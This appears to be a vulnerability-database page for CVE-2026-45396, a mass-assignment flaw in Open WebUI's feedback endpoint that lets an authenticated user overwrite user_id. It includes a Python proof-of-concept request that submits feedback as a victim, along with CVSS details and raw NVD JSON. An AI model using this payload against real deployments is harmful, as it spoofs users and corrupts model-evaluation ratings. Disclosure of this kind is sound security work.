CVE-2026-45396

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, the POST /api/v1/evaluations/feedback endpoint in Open WebUI v0.9.2 is vulnerable to mass assignment via FeedbackForm, which uses model_config = ConfigDict(extra='allow'). Due to an insecure dictionary merge order in insert_new_feedback(), an authenticated attacker can inject a user_id field in the request body that overwrites the server-derived value, creating feedback records attributed to any arbitrary user. This corrupts the model evaluation leaderboard (Elo ratings) and enables identity spoofing. This vulnerability is fixed in 0.9.5.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.9.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL
url = "http://target-ip:3000/api/v1/evaluations/feedback"

# Attacker's session cookie (low privilege user)
cookies = {
    "auth_token": "attacker_valid_token_here"
}

# Malicious payload injecting user_id to impersonate victim
payload = {
    "content": "This is a malicious feedback to manipulate ratings",
    "rating": 1,
    "user_id": "target_victim_user_id", # Key exploitation: overwrite server-derived ID
    "model_id": "some_model_id"
}

# Send the request
response = requests.post(url, json=payload, cookies=cookies)

if response.status_code == 200:
    print("PoC successful: Feedback submitted as target user.")
else:
    print(f"PoC failed: {response.status_code}, {response.text}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45396
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45396
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45396/
[4] VulDB https://vuldb.com/cve/CVE-2026-45396
[5] https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g
[6] https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45396", "sourceIdentifier": "[email protected]", "published": "2026-05-15T21:16:37.590", "lastModified": "2026-05-15T23:16:21.383", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, the POST /api/v1/evaluations/feedback endpoint in Open WebUI v0.9.2 is vulnerable to mass assignment via FeedbackForm, which uses model_config = ConfigDict(extra='allow'). Due to an insecure dictionary merge order in insert_new_feedback(), an authenticated attacker can inject a user_id field in the request body that overwrites the server-derived value, creating feedback records attributed to any arbitrary user. This corrupts the model evaluation leaderboard (Elo ratings) and enables identity spoofing. This vulnerability is fixed in 0.9.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-915"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}